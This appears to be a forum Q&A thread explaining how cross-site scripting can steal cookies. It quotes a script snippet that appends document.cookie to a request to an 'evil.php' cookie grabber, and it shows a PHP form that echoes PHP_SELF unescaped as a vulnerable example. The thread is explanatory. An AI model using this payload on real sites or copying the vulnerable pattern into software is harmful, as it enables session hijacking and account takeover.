I understand that XSS is when you can get a site to run arbitrary JavaScript by appending it to a URL or embedding it in the page somehow.
I understand this is bad because it can allow people to steal cookies and such.
What I don't understand is how that is possible. ALl my reading about it just shows people using alert() to display the cookie....which would display it to the user clicking on it.
Is it actually possible with JS to send a cookie remotely to another PC? How?
This post might help: http://airodump.net/advanced-cross-site-scripting-xss/
yes if a hacker can add his javascript code into the page, he can send cookies with ajax or with form post. Javascript method document.cookie holds cookie information for that domain.
<SCRIPT type="text/javascript">
var adr = '../evil.php?cakemonster=' + escape(document.cookie);
</SCRIPT>
The above code will pass an escaped content of the cookie (according to RFC content must be escaped before sending it via HTTP protocol with GET method) to the evil.php script in "cakemonster" variable. The attacker then checks the results of his evil.php script (a cookie grabber script will usually write the cookie to a file) and use it.
Source: http://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29
First off, XSS does not mean JS based attacks. XSS = cross site scripting (forcing a site to run your script, any script)
Now for the issue at hand, think about the following
<form method="post" action="<?php echo $_SERVER['PHP_SELF']; ?>">
This is an evil (and common) piece of code that allows you to force the running site to execute any script you write in the address bar (If you're interested, this vulnerability is described here) . You can send the said URL (with the script) as a link, and anyone who clicks this link runs your script.
For instance, using VBScript you can transmit the cookie ID-ing the user back to yourself, and by that take over his identity. This is all done without the user or the host site even being aware that something's wrong.